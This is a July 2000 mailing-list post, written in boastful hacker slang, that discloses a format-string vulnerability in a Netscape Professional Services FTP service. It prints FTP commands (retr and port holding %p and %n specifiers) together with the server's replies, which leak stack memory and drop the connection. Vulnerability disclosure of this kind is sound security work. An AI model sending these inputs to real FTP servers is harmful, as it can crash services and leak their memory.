Vulnerability Development mailing list archives

CRYX present: netscape profesional services ftp service

From: l33thax0r () HOTMAIL COM (l33thax0r)
Date: Wed, 19 Jul 2000 11:20:30 +0200

Yeah, yeah, it is gonna be first C.R.Y.X. advisory, blah!:-)

we reporting it to you, people, because th1z vulnerability seems to fly
around for some time, so it'z probably better to warn someone, b'koz
we aren't lame scr1ptz-kiddiez expl0iting everone around with their
0day-stolen script! <actually this bug is not find by me, but 2 many ppl
here know it already and none reported it!>

so what we have? yeppa, those d00dz fixed it last bug with directoris and
think itz safe??? HAHAHAHAHAH... every version is still buggy as hell, and
nothing will change it! plenty of bugs, and here is 1 of them:

retr %p %p %p %p %p %p %p %p %p %p
550-Type of object is "unknown/unknown". Transfer MODE is BINARY.
550 open(4b7b1 0 efffeb31 0 53796e74 61782123 72726f12 20674372
6128d432 509e5123): can't open file

retr %n
Connection closed by foreign host.

Buhahahah! You think that's all? Naaaaah!

port %p,%p,%p,%p,%p,%p,%p,%p,%p,%p
501 Syntax error during PORT 4b7b1,0,efffeb31,0,53796e74,61782123,
72726f12,20674372,6128d432,509e5123

port %n
Connection closed by foreign host.

And you think that's all? Naaah! I d0n't care.
gr33tings to all our friendz - you know who y0u are!
special gr33tings to d00d that find this bug!

C.R.Y.X. is:

  l33thax0r = me :-)
  grishm4n  = he is really c00l!
  m4dman__  = c/c++ codah!
  ...want join us? mail!

sorry for bad english & have a good d4y!
signed: l33thax0r of C.R.Y.X.

Jest nas coraz wiecej... coraz mniej wiemy o sobie.
II Badanie Polskich Uzytkownikow Sieci Internet
http://badanie.ae.krakow.pl/badanie/cbadanie.cgi
Do udzialu zaprasza Katedra Marketingu AE w Krakowie